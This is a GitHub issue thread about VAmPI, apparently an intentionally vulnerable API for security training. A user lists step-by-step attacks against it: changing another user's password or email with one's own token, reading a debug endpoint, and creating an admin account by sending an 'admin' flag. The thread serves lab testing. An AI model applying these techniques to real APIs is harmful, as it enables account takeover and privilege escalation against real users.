VAmPI icon indicating copy to clipboard operation
VAmPI copied to clipboard
verified publisher icon erev0s

Share attack scripts

Open janibashamd opened this issue 3 years ago • 4 comments

Hi,

I can see doc says this demo app supports multiple attacks but i don't see attack payloads. So can you please share them so i can also test these attacks.

Thanks, Jani

janibashamd avatar Jun 22 '22 01:06 janibashamd

hey @janibashamd attack payloads are not provided. All the attacks though are pretty straight forward. Might be an idea to create a postman collection with the usual payloads (sqli, mass assignment etc.)

erev0s avatar Jun 22 '22 13:06 erev0s

Yes for a novice user like me it will be really helpful if you can provide steps of each attack or provide us postman collection for each attack.

janibashamd avatar Jun 22 '22 16:06 janibashamd

@erev0s atleast tell me about sqli and ReDOS attacks generation steps please. I am trying these 2 as per docs but seems like attack is not getting generated.

I will really appreciate if you can provide above 2 attacks as it's little critical for me..

janibashamd avatar Jun 23 '22 15:06 janibashamd

@erev0s Below are my observations: API1:2019 Broken Object Level Authorization (not entirely sure)

  1. Create new user "jani/jani/[email protected]"
  2. Login to user "jani/jani" using login API and copy the auth token
  3. Provide the auth token of jani in update email API and change it for name1 ({{baseUrl}}/users/v1/name1/email) Issue: As per URL email should be updated for "name1" but observed email getting changed for "jani" user (token owner but not URL object)

API2:2019 Broken User Authentication - Unauthorized Password Change

  1. Create new user "jani/jani/[email protected]"
  2. Login to user "jani/jani" using login API and copy the auth token
  3. Provide the auth token of jani in update password API and change it for name1 ({{baseUrl}}/users/v1/name1/password) Issue: Even though token is from "jani" user we are able to update password of different user "name1"

API3:2019 Excessive Data Exposure through debug endpoint: {{baseUrl}}/users/v1/_debug

API5:2019 Broken Function Level Authorization We can create new users with admin privileges using admin key as below: { "username": "test", "password": "test", "email": "[email protected]", "admin": "True" }

API6:2019 Mass Assignment - GET {{baseUrl}}/books/v1/JaniBook2 with any token gives any book details including secret of other users

Please let me know if my assumptions are incorrect.

janibashamd avatar Jun 23 '22 15:06 janibashamd

Update the postman collection with some examples for some specific attacks. You can also check the blog post here https://erev0s.com/blog/vampi-vulnerable-api-security-testing/ for more details for the rest of the attacks that does not make sense to put in an example in the collection.

erev0s avatar Feb 10 '23 15:02 erev0s